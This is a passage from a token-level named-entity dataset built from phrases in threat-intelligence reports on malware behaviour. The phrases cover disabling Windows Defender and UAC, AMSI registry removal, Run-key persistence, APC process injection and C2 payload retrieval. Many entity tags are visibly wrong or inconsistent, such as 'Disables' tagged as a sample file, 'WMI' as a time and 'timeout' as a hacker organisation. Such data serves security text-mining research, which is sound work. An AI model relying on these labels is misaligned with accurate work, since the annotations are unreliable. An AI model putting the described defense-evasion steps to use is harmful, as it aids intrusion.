"O", - "O" - ] - }, - { - "tokens": [ - "Sets", - "Network", - "Protection", - "to", - "audit", - "mode", - "in", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "MAPS", - "(Microsoft", - "Active", - "Protection", - "Service)", - "reporting" - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "I-SecTeam", - "I-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "Allows", - "severe/high/moderate/low-level", - "threats", - "to", - "execute" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "the", - "\"administrator", - "in", - "Admin", - "Approval", - "Mode\"", - "user", - "type", - "(disables", - "UAC", - "prompts)" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stops", - "the", - "WinDefend", - "service", - "(Windows", - "Defender)" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Disables", - "the", - "startup", - "of", - "the", - "WinDefend", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Deletes", - "the", - "WinDefend", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stops", - "the", - "Microsoft", - "Defender", - "Antivirus", - "Network", - "Inspection", - "Service", - "(WdNisSvc)" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "designed", - "to", - "hamper", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "fool", - "potential", - "victims", - "into", - "opening", - "them." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "users", - "still", - "need", - "to", - "manually", - "mount", - "them", - "and", - "run", - "the", - "fake", - "PDFs", - "to", - "trigger", - "the", - "infection", - "chain" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Manually", - "executing", - "the", - "lnk", - "file", - "triggers" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Manual", - "interactions", - "are", - "required" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "lot", - "of", - "junk", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogging" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "taking", - "screenshots" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "load", - "a", - "binary", - "into", - "memory", - "that", - "injects" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "modify", - "group", - "policy", - "for", - "privilege", - "escalation", - "and", - "defense", - "evasion" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Idus", - "B-Purp" - ] - }, - { - "tokens": [ - "can", - "modify", - "group", - "policy", - "for", - "privilege", - "escalation", - "and", - "defense", - "evasion." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Purp", - "O", - "B-Idus", - "B-Purp" - ] - }, - { - "tokens": [ - "Attempts", - "to", - "delete", - "malicious", - "batch", - "files." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "makes", - "modifications", - "to", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adds", - "a", - "custom", - "icon", - "to", - "the", - "registry," - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "modifies", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "a", - "registry", - "key", - "HKCU\\Control", - "Panel\\Desktop" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disables", - "Windows", - "Defender", - "with", - "batch", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "with", - "batch", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "batch", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "Mimikatz", - "to", - "dump", - "passwords." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uses", - "GetComputerName", - "to", - "query", - "the", - "computer", - "name." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "used", - "RDP", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "installed", - "and", - "used", - "legitimate", - "tools", - "such", - "as", - "TeamViewer", - "and", - "AnyConnect", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "iterate", - "through", - "the", - "entire", - "file", - "system," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Victims", - "receive", - "spear", - "phishing", - "emails", - "with", - "attached", - "malicious", - "zip", - "files" - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encoded", - "PowerShell", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scripts", - "to", - "download", - "additional", - "scripts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "benign-looking", - "services", - "for", - "the", - "ransomware", - "binary." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creates", - "benign-looking", - "services", - "for", - "the", - "ransomware", - "binary." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lists", - "internal", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "installed", - "and", - "used", - "PsExec", - "to", - "execute", - "payloads", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malicious", - "actors", - "typically", - "gain", - "entry", - "to", - "organizations’", - "Microsoft", - "365", - "environments", - "by", - "abusing", - "either", - "stolen", - "account", - "credentials" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "actors", - "behaving", - "in", - "predictable", - "ways", - "once", - "they", - "gain", - "access", - "to", - "customer", - "Microsoft", - "365", - "environment." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Actor", - "signs", - "in", - "to", - "a", - "Microsoft", - "365", - "account", - "from", - "an", - "endpoint" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malicious", - "actor", - "signing", - "in", - "to", - "a", - "Microsoft", - "365", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "the", - "actor", - "took", - "after", - "logging", - "in", - "to", - "a", - "user’s", - "Microsoft", - "365", - "account" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "malicious", - "actor", - "was", - "observed", - "signing", - "in", - "to", - "a", - "Microsoft", - "365", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "began", - "with", - "an", - "actor", - "signing", - "into", - "an", - "internal", - "user’s", - "Microsoft", - "365", - "account", - "from", - "a", - "VPN" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "spoof", - "of", - "the", - "legitimate", - "‘PerfectData’", - "software", - "designed", - "to", - "masquerade", - "a", - "malicious", - "application", - "as", - "legitimate" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "brute-force", - "activity" - ], - "ner_tags": [ - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "The", - "emails", - "included", - "an", - "attachment", - "named", - "‘Credit", - "Transfer", - "Copy.html’" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "capable", - "of", - "modifying", - "Windows", - "UAC", - "prompt,", - "disabling", - "Windows", - "Defender", - "notifications,", - "disabling", - "Task", - "Manager,", - "disabling", - "command", - "prompt,", - "preventing", - "users", - "from", - "accessing", - "Windows", - "registry", - "tools,", - "disabling", - "the", - "Run", - "command,", - "and", - "modifying", - "the", - "display", - "timeout" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "O", - "B-HackOrg", - "B-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "performing", - "antivirus", - "tampering" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "script", - "retrieves", - "NSudo", - "and", - "modifies", - "Windows", - "UAC", - "prompt", - "behavior", - "by", - "allowing", - "administrators", - "to", - "perform", - "operations", - "without", - "authentication", - "or", - "consent", - "prompts" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disabling", - "Windows", - "Defender", - "notifications,", - "Disabling", - "Task", - "Manager,", - "Disabling", - "command", - "prompt,", - "Preventing", - "users", - "from", - "accessing", - "Windows", - "registry", - "tools,", - "Disabling", - "Run", - "command,", - "Modifying", - "the", - "display", - "timeout" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actor(s)", - "made", - "sure", - "to", - "add", - "more", - "paths", - "and", - "folders", - "to", - "Windows", - "Defender", - "exclusion", - "including", - "%TEMP%", - "and", - "C:\\Windows\\*", - "as", - "well", - "as", - "adding", - ".ps1", - "(PowerShell)", - "extension", - "to", - "the", - "exclusion", - "list." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Disabling", - "Windows", - "Defender", - "notifications,", - "Task", - "Manager", - "and", - "Command", - "Prompt" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "recursively", - "removes", - "the", - "implementation", - "of", - "Windows", - "Defender", - "IOfficeAntiVirus" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "then", - "adds", - "the", - "extensions", - "such", - "as", - "exe", - "and", - "DLL", - "as", - "exclusions", - "to", - "Windows", - "Defender." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "performs", - "the", - "antivirus", - "checks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "checks", - "the", - "host", - "against", - "the", - "list", - "of", - "antiviruses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "antivirus", - "check", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "the", - "malicious", - "update.bat", - "file", - "from", - "the", - "C2", - "domain" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "the", - "capability", - "of", - "sending", - "additional", - "payloads", - "to", - "the", - "hosts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "pulling", - "additional", - "BatLoader", - "payloads", - "and", - "scripts", - "from", - "C2" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "retrieves", - "the", - "same", - "files", - "from", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executing", - "scripts", - "and", - "commands", - "retrieved", - "from", - "C2", - "such", - "as", - "ps1,", - "bat,", - "vbs,", - "and", - "exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "the", - "script", - "retrieves", - "the", - "Cobalt", - "Strike", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "retrieves", - "and", - "executes", - "the", - "runanddelete.bat", - "and", - "scripttodo.ps1", - "scripts", - "from", - "the", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "the", - "full", - "set", - "of", - "malware", - "is", - "retrieved", - "from", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "retrieving", - "malware", - "from", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "was", - "executed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file", - "to", - "run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd", - "/C" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "username" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "username" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "username" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "obtains", - "all", - "entries", - "within", - "the", - "IPs", - "starting", - "with", - "192.,", - "10.,", - "and", - ".172", - "in", - "the", - "ARP", - "cache", - "table" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "then", - "checks", - "the", - "amount", - "of", - "IPs", - "found", - "in", - "the", - "ARP", - "table" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ARP", - "table" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "GPG-encrypted", - "files:" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "strings", - "reside", - "within", - "the", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "data", - "stored", - "in", - "the", - "BSS", - "section", - "is", - "encoded" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encoded", - "data", - "in", - "the", - "BSS", - "section" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "on", - "the", - "API", - "calls", - "QueryPerformanceFrequency", - "and", - "QueryPerformanceCounter" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "from", - "API", - "call", - "GetSystemTimeAsFileTime" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "using", - "the", - "API" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "traffic", - "beaconing", - "contains", - "the", - "following", - "pattern", - "that", - "will", - "be", - "encrypted", - "with", - "the", - "AES", - "key", - "extracted", - "from", - "the", - "compressed", - "blob" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "encrypted", - "with", - "AES-128", - "beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "OS", - "version", - "and", - "system", - "type" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "screenshot" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "then", - "collects", - "the", - "credentials,", - "host", - "information,", - "files," - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Syncro", - "RMM", - "is", - "a", - "Remote", - "Monitoring", - "and", - "Management", - "tool", - "used", - "to", - "control", - "and", - "manage", - "devices", - "remotely." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "tool", - "can", - "be", - "used", - "as", - "a", - "persistence", - "mechanism", - "and", - "remote", - "accessing" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Syncro", - "RMM", - "can", - "also", - "be", - "used", - "as", - "a", - "persistence", - "mechanism" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leverages", - "SOCKS5" - ], - "ner_tags": [ - "O", - "B-Way" - ] - }, - { - "tokens": [ - "leverages", - "SOCKS5", - "proxies", - "to", - "hide", - "malicious", - "traffic" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "task", - "scheduling" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "proceeds", - "with", - "scheduled", - "task", - "creation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "run", - "the", - "scheduled", - "task", - "every", - "2", - "minutes", - "is", - "start." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "the", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creating", - "the", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "These", - "words", - "are", - "used", - "to", - "build", - "the", - "registry", - "value", - "names." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "recursively", - "removes", - "the", - "implementation", - "of", - "Windows", - "Defender", - "IOfficeAntiVirus", - "under", - "HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "enables", - "the", - "data", - "transfer", - "with", - "URL", - "syntax", - "for", - "protocols", - "such", - "as", - "HTTP/HTTPS" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "runs", - "it", - "via", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "injects", - "itself", - "into", - "explorer.exe" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "injecting", - "itself", - "into", - "a", - "running", - "explorer.exe", - "process." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "injecting", - "itself", - "into", - "a", - "running", - "explorer.exe", - "process" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "performs", - "process", - "injection", - "using", - "the", - "API", - "such", - "as", - "OpenThread", - "(to", - "create", - "a", - "handle", - "to", - "an", - "existing", - "process),", - "VirtualAlloc", - "(memory", - "allocation", - "in", - "the", - "chosen", - "process),", - "and", - "QueueUserAPC,", - "the", - "thread", - "that", - "the", - "APC", - "(Asynchronous", - "Procedure", - "Calls)", - "is", - "queued", - "to", - "has", - "to", - "enter", - "an", - "alertable", - "state" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "accessing", - "browser", - "credentials", - "and", - "cookies,", - "Thunderbird", - "and", - "Outlook", - "profiles" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "creates", - "the", - "persistence", - "via", - "Registry", - "Run", - "Keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "creates", - "a", - "persistence", - "via", - "Registry", - "Run", - "Keys", - "under", - "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "it", - "stores", - "three", - "embedded", - "binaries", - "within", - "the", - "unpacked", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "embedded", - "compressed", - "binaries" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "compressed", - "binary" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "unpacked", - "payload" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "binaries", - "are", - "compressed", - "using", - "APLib", - "compression", - "algorithm." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "unpacked", - "sample", - "is", - "approximately", - "540", - "KB" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "unpacked", - "sample", - "is", - "approximately", - "540", - "KB" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decompress", - "data", - "blobs" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decompress", - "them" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decompression", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypted", - "strings" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Decompiled", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "function", - "in", - "Python" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "function" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryption", - "function" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APLib", - "decompression", - "function" - ], - "ner_tags": [ - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "them" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decryption", - "function", - "is", - "shown", - "below,", - "the", - "decryption", - "function", - "can", - "be", - "represented", - "as", - "the", - "following", - "pseudocode:" - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "GPG", - "decryption", - "routine" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "GPG", - "decryption" - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "wmic" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "reg.exe", - "query" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "that", - "pulls", - "the", - "written", - "data", - "from", - "the", - "registry", - "under", - "HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\Microsoft\\<registry_value>>" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "Tor", - "communication", - "capability" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Configured", - "for", - "WMI", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "WMI", - "Persistence" - ], - "ner_tags": [ - "B-Time", - "O" - ] - }, - { - "tokens": [ - "As", - "tasklist", - "uses", - 